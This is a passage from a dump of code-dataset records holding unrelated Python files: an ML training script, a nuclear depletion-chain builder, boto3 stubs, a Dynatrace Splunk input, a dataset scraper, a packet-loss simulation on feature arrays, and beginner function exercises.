quality/unknown:\"+\"\\t\"+str(lowQ_records)+\"\\t\"+str(lowQ_percent)+\"\\n\\n\")\n \n # sorted table of matched indexes and counts\n out_file.write(\"Matched index pairs\"+\"\\t\"+\"# of occurances\"+\"\\n\")\n for item in sorted(matched_dict):\n out_file.write(str(item)+\"\\t\"+str(matched_dict[item])+\"\\n\")\n out_file.write(\"\\n\\n\")\n \n # Sorted table of hopped indexes and counts\n out_file.write(\"Hopped index pairs\"+\"\\t\"+\"# of occurances\"+\"\\n\")\n for item in sorted(hopped_dict):\n out_file.write(str(item)+\"\\t\"+str(hopped_dict[item])+\"\\n\")","sub_path":"Assignment-the-third/demux.py","file_name":"demux.py","file_ext":"py","file_size_in_byte":11223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"432451872","text":"# -*- coding: utf-8 -*-\nimport os\nimport tensorflow as tf\nimport pandas as pd\nimport numpy as np\nimport logging\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n\ndef get_logger(name=None):\n logger = logging.getLogger(name)\n logger.setLevel(logging.INFO)\n # console\n sh = logging.StreamHandler()\n sh.setLevel(logging.INFO)\n formatter = logging.Formatter('[%(asctime)s][%(levelname)s] %(message)s')\n sh.setFormatter(formatter)\n logger.addHandler(sh)\n return logger\n\t\ndef decode_csv(line):\n\ta=[[0.0] for i in range(785)] \n\tparsed_line = tf.decode_csv(line, a)\n\t#print parsed_line\n\tlabel=parsed_line[0]\n\tlabel = tf.cast(label, tf.int64)\n\tfeatures=tf.stack(parsed_line[1:])\n\tfeatures=tf.cast(features,tf.float32)\n\tfeatures=tf.multiply(features,1/255.)\n\tfeatures = tf.reshape(features, [28,28,1])\n\treturn features,label\n\n \ndef process(batch_size=64):\n\tdataset = tf.data.TextLineDataset('./data/fashion-mnist_train.csv').skip(1)\n\tdataset = dataset.map(decode_csv)\n\tdataset = dataset.batch(batch_size=batch_size)\n\tdataset = dataset.repeat() \n\treturn dataset\ndef train():\n #network\n \n\tinputs = tf.placeholder(tf.float32, [None, 28, 28, 1], name='inputs')\n\t# inputs=tf.random_normal([64, 28,28,1], 0.0, 0.05)\n\tconv1 = tf.layers.conv2d(inputs=inputs, filters=64, kernel_size=(3, 3), padding=\"same\", activation=tf.nn.relu) \n\tconv2 = tf.layers.conv2d(inputs=conv1, filters=64, kernel_size=(3, 3), padding=\"same\", activation=tf.nn.relu)\n\tpool1 = tf.layers.max_pooling2d(inputs=conv2, pool_size=[2, 2], strides=2)\n\tconv3 = tf.layers.conv2d(inputs=pool1, filters=128, kernel_size=(3, 3), padding=\"same\", activation=tf.nn.relu)\n\tconv4 = tf.layers.conv2d(inputs=conv3, filters=128, kernel_size=(3, 3), padding=\"same\", activation=tf.nn.relu)\n\tpool2 = tf.layers.max_pooling2d(inputs=conv4, pool_size=[2, 2], strides=2)\n\tpool2_flat = tf.reshape(pool2, [-1, 7 * 7 * 128])\n\tfc1 = tf.layers.dense(pool2_flat, 500, activation=tf.nn.relu)\n\tdropout=tf.layers.dropout(inputs=fc1,rate=0.5)\n\tfc2 = tf.layers.dense(dropout, 10)\n\ty_out = tf.nn.softmax(fc2)\n\ty_ = tf.placeholder(tf.float32, [None, 10])\n\tcross_entropy = -tf.reduce_mean(y_ * tf.log(y_out)) # 计算交叉熵\n\t\n\tlearning_rate=0.001\n\ttrain_step = tf.train.AdamOptimizer(learning_rate).minimize(cross_entropy)\n\tcorrect_prediction = tf.equal(tf.argmax(y_out, 1), tf.argmax(y_, 1)) # 判断预测标签和实际标签是否匹配\n\taccuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\"))\n\t\n\tdataset=process()\n\titerator = dataset.make_one_shot_iterator() \n\timg_batch, label_batch = iterator.get_next() \n \n\tinit = tf.global_variables_initializer() \n\tlogger=get_logger()\n\twith tf.Session() as session: \n\t\tsession.run(init) \n\t\tthreads = tf.train.start_queue_runners() \n\t\tsaver = tf.train.Saver(tf.global_variables(), max_to_keep=20) \n\t\tfor i in range(10000): \n\t\t\timg_batch_i, label_batch_i = session.run([img_batch, tf.one_hot(label_batch, depth=10)]) \n\t\t\tfeed = {inputs: img_batch_i, y_: label_batch_i} \n\t\t\tloss,_,acc=session.run([cross_entropy,train_step,accuracy], feed_dict=feed) \n\t\t\tlogger.info(\"step%d loss:%f accuracy:%F lr:%F\"%(i,loss,acc,learning_rate)) \n\t\t\t \n\t\tsaver.save(session, \"./mnist.ckpt\")\nif __name__==\"__main__\":\n\ttrain_data_path='data/fashion-mnist_train.csv'\n\ttfrecord_name='train.tfrecords'\n\ttrain()\n\t#process()\n\t\n","sub_path":"tensorflow/fashion_mnist_parse_csv.py","file_name":"fashion_mnist_parse_csv.py","file_ext":"py","file_size_in_byte":3308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"305174671","text":"\"\"\"depletion_chain module.\n\nThis module contains information about a depletion chain. A depletion chain is\nloaded from an .xml file and all the nuclides are linked together.\n\"\"\"\n\nfrom collections import OrderedDict\nimport zernike\n\n_REACT_LIST=['fission', '(n,gamma)', '(n,2n)', '(n,3n)', '(n,4n)', '(n,p)', '(n,a)'] # Jiankai \n\nclass DepletionChain:\n \"\"\" The DepletionChain class.\n\n This class contains a full representation of a depletion chain.\n\n Attributes\n ----------\n n_nuclides : int\n Number of nuclides in chain.\n n_fp_nuclides : int\n Number of fission product nuclides in chain.\n nuclides : List[nuclide.Nuclide]\n List of nuclides in chain.\n nuclide_dict : OrderedDict[int]\n Maps a nuclide name to an index in nuclides.\n precursor_dict : OrderedDict[int]\n Maps a nuclide name to an index in yields.fis_yield_data\n yields : nuclide.Yield\n Yield object for fission.\n reaction_to_ind : OrderedDict[int]\n Dictionary mapping a reaction name to an index in ReactionRates.\n \"\"\"\n\n def __init__(self):\n self.n_nuclides = None\n self.n_fp_nuclides = None\n self.nuclides = None\n\n self.nuclide_dict = None\n self.precursor_dict = None\n\n self.yields = None\n\n self.react_to_ind = None\n\n def xml_read(self, filename):\n \"\"\" Reads a depletion chain xml file.\n\n Parameters\n ----------\n filename : str\n The path to the depletion chain xml file.\n\n Todo\n ----\n Allow for branching on capture, etc.\n \"\"\"\n import xml.etree.ElementTree as ET\n import code\n import numpy as np\n import nuclide\n\n # Create variables\n self.n_nuclides = 0\n self.n_fp_nuclides = 0\n self.nuclides = []\n self.react_to_ind = OrderedDict()\n self.nuclide_dict = OrderedDict()\n\n # Load XML tree\n root = ET.parse(filename)\n\n # Read nuclide tables\n decay_node = root.find('decay_constants')\n\n nuclide_index = 0\n reaction_index = 0\n\n for nuclide_node in decay_node.findall('nuclide_table'):\n self.n_nuclides += 1\n\n nuc = nuclide.Nuclide()\n\n # Just set it to zero to ensure it's set\n nuc.yield_ind = 0\n nuc.fission_power = 0.0\n\n nuc.name = nuclide_node.get('name')\n nuc.n_decay_paths = int(nuclide_node.get('decay_modes'))\n nuc.n_reaction_paths = int(nuclide_node.get('reactions'))\n\n self.nuclide_dict[nuc.name] = nuclide_index\n\n # Check for decay paths\n if nuc.n_decay_paths > 0:\n # Create objects\n nuc.decay_target = []\n nuc.decay_type = []\n nuc.branching_ratio = []\n\n nuc.half_life = float(nuclide_node.get('half_life'))\n\n for decay_node in nuclide_node.iter('decay_type'):\n nuc.decay_target.append(decay_node.get('target'))\n nuc.decay_type.append(decay_node.get('type'))\n nuc.branching_ratio.append(\n float(decay_node.get('branching_ratio')))\n\n # Check for reaction paths\n if nuc.n_reaction_paths > 0:\n # Create objects\n nuc.reaction_target = []\n nuc.reaction_type = []\n\n for reaction_node in nuclide_node.iter('reaction_type'):\n r_type = reaction_node.get('type')\n\n # Add to total reaction types\n if r_type not in self.react_to_ind: # and r_type in _REACT_LIST: # Jiankai \n self.react_to_ind[r_type] = reaction_index\n reaction_index += 1\n\n nuc.reaction_type.append(r_type)\n # If the type is not fission, get target, otherwise\n # just set the variable to exists.\n if r_type != 'fission':\n nuc.reaction_target.append(reaction_node.get('target'))\n else:\n nuc.reaction_target.append(0)\n nuc.fission_power = float(reaction_node.get('energy'))\n\n self.nuclides.append(nuc)\n nuclide_index += 1\n\n # Read neutron induced fission yields table\n nfy_node = root.find('neutron_fission_yields')\n\n self.yields = nuclide.Yield()\n\n # code.interact(local=locals())\n\n # Create and load all the variables\n self.yields.n_fis_prod = int(nfy_node.find('nuclides').text)\n self.yields.n_precursors = int(nfy_node.find('precursor').text)\n self.yields.n_energies = int(nfy_node.find('energy_points').text)\n\n temp = nfy_node.find('precursor_name').text\n self.yields.precursor_list = [x for x in temp.split()]\n\n temp = nfy_node.find('energy').text\n self.yields.energy_list = [float(x) for x in temp.split()]\n\n self.yields.energy_dict = OrderedDict()\n self.precursor_dict = OrderedDict()\n\n # Form dictionaries out of inverses of lists\n energy_index = 0\n\n for x in self.yields.energy_list:\n self.yields.energy_dict[x] = energy_index\n energy_index += 1\n\n precursor_index = 0\n\n for x in self.yields.precursor_list:\n self.precursor_dict[x] = precursor_index\n precursor_index += 1\n\n # Allocate variables\n self.yields.name = []\n\n self.yields.fis_yield_data = np.zeros([self.yields.n_fis_prod,\n self.yields.n_energies,\n self.yields.n_precursors])\n\n self.yields.fis_prod_dict = OrderedDict()\n\n product_index = 0\n\n # For eac fission product\n for yield_table_node in nfy_node.findall('nuclide_table'):\n name = yield_table_node.get('name')\n self.yields.name.append(name)\n\n nuc_ind = self.nuclide_dict[name]\n\n self.nuclides[nuc_ind].yield_ind = product_index\n\n # For each energy (table)\n for fy_table in yield_table_node.findall('fission_yields'):\n energy = float(fy_table.get('energy'))\n\n energy_index = self.yields.energy_dict[energy]\n\n self.yields.fis_prod_dict[name] = product_index\n temp = fy_table.find('fy_data').text\n self.yields.fis_yield_data[product_index, energy_index, :] = \\\n [float(x) for x in temp.split()]\n\n product_index += 1\n\n def form_matrix(self, rates, cell_id):\n \"\"\" Forms depletion matrix.\n\n Parameters\n ----------\n rates : reaction_rates.ReactionRates\n Reaction rates to form matrix from.\n cell_id : int\n Cell coordinate in rates to evaluate for.\n\n Returns\n -------\n matrix : scipy.sparse.csr_matrix\n Sparse matrix representing depletion.\n \"\"\"\n\n import scipy.sparse as sp\n import math\n\n np = rates.n_poly\n\n matrix = sp.dok_matrix((self.n_nuclides * np, self.n_nuclides * np))\n\n for i in range(self.n_nuclides):\n nuclide = self.nuclides[i]\n\n if nuclide.n_decay_paths != 0:\n # Decay paths\n # Loss\n decay_constant = math.log(2)/nuclide.half_life\n\n for p in range(np):\n\n matrix[i*np + p, i*np + p] -= decay_constant\n\n # Gain\n for j in range(nuclide.n_decay_paths):\n target_nuclide = nuclide.decay_target[j]\n\n # Allow for total annihilation for debug purposes\n if target_nuclide != 'Nothing':\n k = self.nuclide_dict[target_nuclide]\n\n matrix[k*np + p, i*np + p] += \\\n nuclide.branching_ratio[j] * decay_constant\n\n if nuclide.name in rates.nuc_to_ind:\n # Extract all reactions for this nuclide in this cell\n nuc_rates = rates[cell_id, nuclide.name, :, :]\n\n for j in range(nuclide.n_reaction_paths):\n path = nuclide.reaction_type[j]\n # Extract reaction index, and then final reaction rate\n r_id = rates.react_to_ind[path]\n path_rate = nuc_rates[r_id, :]\n\n # Loss term\n for p in range(np):\n for pp in range(np):\n weight_rate = zernike.form_b_matrix(p, pp, path_rate)\n matrix[i*np+pp, i*np+p] -= weight_rate\n\n # Gain term\n target_nuclide = nuclide.reaction_target[j]\n\n # Allow for total annihilation for debug purposes\n if target_nuclide != 'Nothing':\n if path != 'fission':\n k = self.nuclide_dict[target_nuclide]\n matrix[k*np+pp, i*np+p] += weight_rate\n else:\n m = self.precursor_dict[nuclide.name]\n #print('range= ', self.yields.n_fis_prod, 'range=', len(self.yields.name) ) # jiankai\n for k in range(self.yields.n_fis_prod):\n l = self.nuclide_dict[self.yields.name[k]]\n # Todo energy\n matrix[l*np+pp, i*np+p] += \\\n self.yields.fis_yield_data[k, 0, m] * \\\n weight_rate\n\n matrix = matrix.tocsr()\n return matrix\n\n def nuc_by_ind(self, ind):\n \"\"\" Extracts nuclides from the list by dictionary key.\n\n Parameters\n ----------\n ind : str\n Name of nuclide.\n\n Returns\n -------\n nuclide.Nuclide\n Nuclide object that corresponds to ind.\n \"\"\"\n return self.nuclides[self.nuclide_dict[ind]]\n\n\ndef matrix_wrapper(input_tuple):\n \"\"\" Parallel wrapper for matrix formation.\n\n This wrapper is used whenever a pmap/map-type function is used to make\n matrices for each cell in parallel.\n\n Parameters\n ----------\n input_tuple : Tuple\n Index 0 is the chain (depletion_chain.DepletionChain), index 1 is the\n reaction rate array (reaction_rates.ReactionRates), index 2 is the\n cell_id.\n\n Returns\n -------\n scipy.sparse.csr_matrix\n The matrix for this reaction rate.\n \"\"\"\n return input_tuple[0].form_matrix(input_tuple[1], input_tuple[2])\n","sub_path":"source/depletion_chain.py","file_name":"depletion_chain.py","file_ext":"py","file_size_in_byte":10908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"209531225","text":"\"\"\"\nType annotations for schemas service client waiters.\n\n[Open documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_schemas/waiters.html)\n\nUsage::\n\n ```python\n import boto3\n\n from mypy_boto3_schemas import SchemasClient\n from mypy_boto3_schemas.waiter import (\n CodeBindingExistsWaiter,\n )\n\n client: SchemasClient = boto3.client(\"schemas\")\n\n code_binding_exists_waiter: CodeBindingExistsWaiter = client.get_waiter(\"code_binding_exists\")\n ```\n\"\"\"\nfrom botocore.waiter import Waiter as Boto3Waiter\n\nfrom .type_defs import WaiterConfigTypeDef\n\n__all__ = (\"CodeBindingExistsWaiter\",)\n\nclass CodeBindingExistsWaiter(Boto3Waiter):\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/schemas.html#Schemas.Waiter.CodeBindingExists)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_schemas/waiters.html#codebindingexistswaiter)\n \"\"\"\n\n def wait(\n self,\n *,\n Language: str,\n RegistryName: str,\n SchemaName: str,\n SchemaVersion: str = None,\n WaiterConfig: WaiterConfigTypeDef = None\n ) -> None:\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/schemas.html#Schemas.Waiter.CodeBindingExists.wait)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_schemas/waiters.html#codebindingexistswaiter)\n \"\"\"\n","sub_path":"typings/mypy_boto3/schemas/waiter.pyi","file_name":"waiter.pyi","file_ext":"pyi","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"597789828","text":"# -*- coding:utf8 -*-\n\nimport json\nimport os\n\ndict_mots_index = {}\ndict_produits_mots = {}\n\nif os.path.exists(\"mots_index.dict\"):\n with open(\"mots_index.dict\", 'r') as fichier:\n dict_mots_index = json.load(fichier)\n\n with open(\"produits_mots.dict\", 'r') as fichier:\n dict_produits_mots = json.load(fichier)\n\nmots_vides = ['le', 'la', 'les', 'de', 'du', 'des', u'à', 'au']\n\ndef dot(v1, v2):\n valeur = 0\n\n for i in range(min(len(v1), len(v2))):\n valeur += v1[i] * v2[i]\n\n return valeur\n\n\ndef index_mot(mot, ajoute=True):\n mot = mot.lower()\n\n if mot in mots_vides:\n return -1\n\n if mot not in dict_mots_index:\n if ajoute == True:\n index = len(dict_mots_index)\n dict_mots_index[mot] = index\n\n return index\n\n return -1\n\n return dict_mots_index[mot]\n\n\ndef sauvegarde_fichiers():\n with open(\"mots_index.dict\", 'w') as fichier:\n fichier.write(json.dumps(dict_mots_index))\n\n with open(\"produits_mots.dict\", 'w') as fichier:\n fichier.write(json.dumps(dict_produits_mots))\n\n\ndef ajoute_produit(id_produit, nom_produit, nom_boulangerie, nom_ville, nom_pays, sauvegarde=True):\n indices = []\n\n # index le produit\n mots = nom_produit.split(' ')\n\n for mot in mots:\n indices.append(index_mot(mot))\n\n mots = nom_boulangerie.split(' ')\n\n for mot in mots:\n indices.append(index_mot(mot))\n\n indices.append(index_mot(nom_ville))\n\n indices.append(index_mot(nom_pays))\n\n # calcul le vecteur du produit\n vecteur = [0 for i in range(len(dict_mots_index))]\n\n for index in indices:\n vecteur[index] = 1\n\n dict_produits_mots[id_produit] = vecteur\n\n if sauvegarde:\n sauvegarde_fichiers()\n\ndef recherche_produit(recherche):\n vecteur = [0 for i in range(len(dict_mots_index))]\n\n # calcule le vecteur de la recherche\n mots = recherche.split(' ')\n mots = [mot for mot in mots if mot not in mots_vides and len(mot) > 0]\n\n for mot in mots:\n index = index_mot(mot, False)\n\n if index != -1:\n vecteur[index] = 1\n\n # compare le vecteur à chaque vecteur des produits\n cles = []\n nombre = 0\n nombre_mots = len(mots)\n\n for cle in dict_produits_mots:\n valeur = dot(dict_produits_mots[cle], vecteur)\n\n if valeur == nombre_mots:\n cles.append(cle)\n nombre += 1\n\n if nombre == 10:\n break\n\n return cles\n","sub_path":"jvdbp/recherche.py","file_name":"recherche.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"552061882","text":"from random import *\nimport os\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ['CUDA_VISIBLE_DEVICES'] = '2'\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = '3'\nimport PIL\nimport tensorflow as tf\nimport numpy as np\nfrom keras import layers\nfrom keras.models import load_model\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.applications import VGG16\nfrom keras.optimizers import SGD\nfrom keras import Sequential\nimport math\nimport sys\nimport gc\nfrom tqdm import tqdm\n\ntf.random.set_seed(960312)\n\nnumber_of_packet_to_drop = int(sys.argv[1])\ndrop_num = number_of_packet_to_drop\nprint(drop_num,\"/64 packet lost\")\npath = \"/media/2/Network/extracted_feature/whole_shuffle_to_19_no-rescale/\"\nsave_path = path+\"with_\"+str(drop_num)+\"_packet_error/\"\nif os.path.isdir(save_path) is False:\n os.mkdir(save_path)\n\ndef packet_drop(arr):\n global number_of_packet_to_drop\n #print(arr.shape)\n index = randrange(65-number_of_packet_to_drop)\n arr[:,:,index*8:(index*8+8*number_of_packet_to_drop)] = 0\ndef error_injection(data):\n for img in tqdm(data):\n #print(img.shape)\n packet_drop(img)\n\nfile_list = os.listdir(path)\ntrain_features = []\ntrain_label = []\ntesting_features = []\ntesting_label = []\nval_features = []\nval_label = []\nfor item in file_list:\n #print(item)\n if \"train_feature\" in item:\n #print(item)\n train_features.append(item)\n elif \"train_label\" in item:\n train_label.append(item)\n elif \"test_label\" in item:\n testing_label.append(item)\n elif \"test_feature\" in item:\n testing_features.append(item)\n elif \"val_feature\" in item:\n val_features.append(item)\n elif \"val_label\" in item:\n val_label.append(item)\ndef concatenate(items,save_name):\n global path \n for index,item in enumerate(items):\n print(index,item)\n if index == 0:\n a = np.load(path+item)#,mmap_mode=\"r\")\n if \"feature\" in save_name :\n error_injection(a)\n print(\"===\",a.shape)\n else :\n tmp = np.load(path+item)#,mmap_mode=\"r\")\n if \"feature\" in save_name :\n error_injection(tmp)\n print(\"===\",tmp.shape)\n a = np.concatenate((a,tmp),axis=0)\n print(a.shape)\n np.save(save_path+save_name,a)\n print(save_name+\".npy saved, shape :\",a.shape)\n del a\n gc.collect()\n\n\nconcatenate(train_label,\"train_label_\"+str(drop_num)) \nconcatenate(train_features,\"train_feature_\"+str(drop_num))\n\nconcatenate(testing_features,\"test_feature_\"+str(drop_num))\nconcatenate(testing_label,\"test_label_\"+str(drop_num))\n\nconcatenate(val_features,\"val_feature_\"+str(drop_num))\nconcatenate(val_label,\"val_label_\"+str(drop_num))\n\nimport os\nos._exit(00)\n","sub_path":"retrain_and_evaluate/1~10/packet_drop_for_no-scale.py","file_name":"packet_drop_for_no-scale.py","file_ext":"py","file_size_in_byte":2749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"211478287","text":"\"\"\"posts table\n\nRevision ID: 2c13ec59dcc8\nRevises: d225d84498ef\nCreate Date: 2020-02-07 19:35:34.509539\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '2c13ec59dcc8'\ndown_revision = 'd225d84498ef'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('post', sa.Column('timestamp', sa.DateTime(), nullable=True))\n op.create_index(op.f('ix_post_timestamp'), 'post', ['timestamp'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_post_timestamp'), table_name='post')\n op.drop_column('post', 'timestamp')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/2c13ec59dcc8_posts_table.py","file_name":"2c13ec59dcc8_posts_table.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"63556530","text":"\n# encoding = utf-8\n\nimport os\nimport sys\nimport time\nimport datetime\nimport requests\nimport json\n\n\n\ndef validate_input(helper, definition):\n pass\n\ndef collect_events(helper, ew):\n\n '''\n Verify SSL Certificate\n '''\n \n ssl_certificate = helper.get_arg('ssl_certificate_verification')\n \n if ssl_certificate == True:\n verify_ssl = True\n else:\n verify_ssl = False\n\n '''\n Force HTTPS\n '''\n \n dynatrace_tenant_input = helper.get_arg('dynatrace_tenant')\n \n if dynatrace_tenant_input.find('https://') == 0:\n opt_dynatrace_tenant = dynatrace_tenant_input\n elif dynatrace_tenant_input.find('http://') == 0:\n opt_dynatrace_tenant = dynatrace_tenant_input.replace('http://', 'https://')\n else: \n opt_dynatrace_tenant = 'https://' + dynatrace_tenant_input\n \n '''\n '''\n \n opt_dynatrace_api_token = helper.get_arg('dynatrace_api_token')\n opt_dynatrace_collection_interval = helper.get_arg('dynatrace_collection_interval')\n opt_dynatrace_entity_endpoints = helper.get_arg('entity_endpoints')\n \n time_offset = int(opt_dynatrace_collection_interval) * 1000\n current_time = int(round(time.time() * 1000))\n offset_time = current_time - time_offset\n\n\n headers = {'Authorization': 'Api-Token {}'.format(opt_dynatrace_api_token),\n 'version':'Splunk TA 1.0.3'}\n api_url = opt_dynatrace_tenant + '/api/v1/entity/'\n parameters = { 'startTimestamp':str(offset_time), \n 'endTimestamp': str(current_time)\n }\n\n for endpoint in opt_dynatrace_entity_endpoints:\n response = helper.send_http_request(api_url + endpoint , \"GET\", headers=headers, parameters=parameters, payload=None, cookies=None, verify=verify_ssl, cert=None, timeout=None, use_proxy=True)\n try:\n response.raise_for_status()\n except:\n helper.log_error (response.text)\n return\n \n data = response.json()\n z = json.dumps(data)\n x = json.loads(z)\n\n for entity in x:\n eventLastSeenTime = entity[\"lastSeenTimestamp\"]/1000\n entity.update({\"timestamp\":eventLastSeenTime})\n entity['endpoint'] = endpoint\n serialized = json.dumps(entity, sort_keys=True)\n event = helper.new_event(data=serialized, time=eventLastSeenTime, host=None, index=None, source=None, sourcetype=None, done=True, unbroken=True)\n ew.write_event(event)\n\n # Save the name of the Dynatrace Server that this data came from\n event = helper.new_event(data='{\"dynatrace_server\":\"' + opt_dynatrace_tenant + '\"}', host=None, index=None, source=None, sourcetype=None, done=True, unbroken=True)\n ew.write_event(event)\n \n \n ","sub_path":"bin/input_module_dynatrace_entity.py","file_name":"input_module_dynatrace_entity.py","file_ext":"py","file_size_in_byte":2777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"268033904","text":"#!/usr/bin/env python\n\n\n'''\nAdapted from https://github.com/matthewgadd/RobotCarDataset-Scraper\n'''\n\n'''\nGets a list of available datasets from the Oxford Robotcar Dataset website.\n\nMatt Gadd\nMar 2019\nOxford Robotics Institute, Oxford University.\n\n'''\n\nimport requests\nimport re\n\nfrom scrape_mrgdatashare import datasets_url\nimport argparse\nfrom pathlib import Path\n\n\navailable_sensor_types = [\n 'tags',\n 'stereo_centre',\n 'stereo_left',\n 'stereo_right',\n 'vo',\n 'mono_left',\n 'mono_right',\n 'mono_rear',\n 'lms_front',\n 'lms_rear',\n 'ldmrs',\n 'gps'\n]\n\ndef absolute_sensor_type(sensor_type):\n # if sensor_type is like stereo_centre_01\n if sensor_type[-2:].isdigit():\n return sensor_type[:-3] # stereo_centre\n\n return sensor_type\n\ndef main(asked_sensors, selected_sequences):\n # open session\n session_requests = requests.session()\n\n # get http response from website\n result = session_requests.get(datasets_url)\n text = result.text\n\n # parse response text\n text_locations = [text_location.end()\n for text_location in re.finditer(datasets_url, text)]\n datasets = [str(text[text_location:text_location + 19])\n for text_location in text_locations]\n\n # ignore metadata and sort unique datasets\n datasets = datasets[2:]\n datasets = sorted(list(set(datasets)))\n\n # write output text file\n datasets_file = \"datasets.csv\"\n with open(datasets_file, \"w\") as file_handle:\n # iterate datasets\n filtered_datasets = (dataset for dataset in datasets if dataset in selected_sequences)\n for dataset in filtered_datasets:\n\n # url to dataset page\n dataset_url = datasets_url + dataset\n result = session_requests.get(dataset_url)\n text = result.text\n\n # parse text for sensor type\n start = [\n text_location.end() for text_location in re.finditer(\n \"download/\\?filename=datasets\", text)]\n sensor_types = []\n for s in start:\n ss = s\n while text[ss + 40:ss + 44] != \".tar\":\n ss += 1\n sensor_type = text[s + 41:ss + 40]\n if absolute_sensor_type(sensor_type) in asked_sensors:\n sensor_types.append(str(sensor_type))\n\n # write dataset entry\n file_handle.write(dataset + \",\" + \",\".join(sensor_types) + \"\\n\")\n\n\n\nif __name__ == \"__main__\":\n # option parsing suite\n argument_parser = argparse.ArgumentParser(\n description=\"get_datasets input parameters\")\n\n # specify CL args\n argument_parser.add_argument(\n \"--sensors\",\n dest=\"asked_sensors\",\n help=\"list of sensors types you want to download, separated by a ',' (default: all sensor types).\\n\"\n + \"e.g: --sensors 'tags,stereo_centre'\\n\"\n + f\"list of available sensor types: {available_sensor_types}\",\n default=available_sensor_types\n )\n\n argument_parser.add_argument(\n \"--sequences\",\n dest=\"selected_sequences\",\n help=\"file with the list of sequences you want to download, one sequence by line (default: all sequences).\",\n default=None\n )\n\n\n # parse CL\n parse_args = argument_parser.parse_args()\n\n asked_sensors = parse_args.asked_sensors\n asked_sensors.replace(\" \", \"\")\n asked_sensors = set(asked_sensors.split(','))\n assert asked_sensors.issubset(set(available_sensor_types)), asked_sensors - set(available_sensor_types)\n\n selected_sequences_file = parse_args.selected_sequences\n selected_sequences_file = Path(selected_sequences_file).expanduser().read_text()\n selected_sequences = selected_sequences_file.splitlines()\n\n main(asked_sensors, selected_sequences)\n","sub_path":"get_datasets.py","file_name":"get_datasets.py","file_ext":"py","file_size_in_byte":3811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"45024547","text":"def greet_users(names):\n \"\"\"Print a simple greeting to each user in the list.\"\"\"\n for name in names:\n msg = \"Hello, \" + name.title() + \"!\"\n print(msg)\n\n\nusernames = [\"hannah\", \"ty\", \"margot\"]\ngreet_users(usernames)\n\n\n# Start with some designs that need to be printed.\nunprinted_designs = [\"iphone case\", \"robot pendant\", \"dodecahedron\"]\ncompleted_models = []\n\n# Simulate printing each design, until none are left.\n# Move each design to completed_models after printing.\nwhile unprinted_designs:\n current_design = unprinted_designs.pop()\n # Simulate creating a 3D print from the design.\n print(\"Printing model: \" + current_design)\n completed_models.append(current_design)\n\n# Display all completed models.\nprint(\"\\nThe following models have been printed:\")\nfor completed_model in completed_models:\n print(completed_model)\n\n\ndef print_models(unprinted_designs, completed_models):\n \"\"\"\n Simulate printing each design, until none are left.\n Move each design to completed_models after printing.\n \"\"\"\n while unprinted_designs:\n current_design = unprinted_designs.pop()\n\n # Simulate creating a 3D print from the design.\n print(\"Printing model: \" + current_design)\n completed_models.append(current_design)\n\n\ndef show_completed_models(completed_models):\n \"\"\"Show all the models that were printed.\"\"\"\n print(\"\\nThe following models have been printed:\")\n for completed_model in completed_models:\n print(completed_model)\n\n\nunprinted_designs = [\"iphone case\", \"robot pendant\", \"dodecahedron\"]\ncompleted_models = []\nprint_models(unprinted_designs, completed_models)\nshow_completed_models(completed_models)\n\n\ndef make_pizza(*toppings):\n \"\"\"Print the list of toppings that have been requested.\"\"\"\n print(toppings)\n\n\nmake_pizza(\"pepperoni\")\nmake_pizza(\"mushrooms\", \"green peppers\", \"extra cheese\")\n\n\ndef make_pizza(*toppings):\n \"\"\"Summarize the pizza we are about to make.\"\"\"\n print(\"\\nMaking a pizza with the following toppings:\")\n for topping in toppings:\n print(\"- \" + topping)\n\n\nmake_pizza(\"pepperoni\")\nmake_pizza(\"mushrooms\", \"green peppers\", \"extra cheese\")\n\n\ndef make_pizza(size, *toppings):\n \"\"\"Summarize the pizza we are about to make.\"\"\"\n print(\"\\nMaking a \" + str(size) + \"-inch pizza with the following toppings:\")\n for topping in toppings:\n print(\"- \" + topping)\n\n\nmake_pizza(16, \"pepperoni\")\nmake_pizza(12, \"mushrooms\", \"green peppers\", \"extra cheese\")\n\n\ndef build_profile(first, last, **user_info):\n \"\"\"Build a dictionary containing everything we know about a user.\"\"\"\n profile = {}\n profile[\"first_name\"] = first\n profile[\"last_name\"] = last\n for key, value in user_info.items():\n profile[key] = value\n return profile\n\n\nuser_profile = build_profile(\n \"albert\", \"einstein\", location=\"princeton\", field=\"physics\"\n)\nprint(user_profile)\n\n\nimport scratch_8_modules as pizza\n\npizza.make_pizza(16, 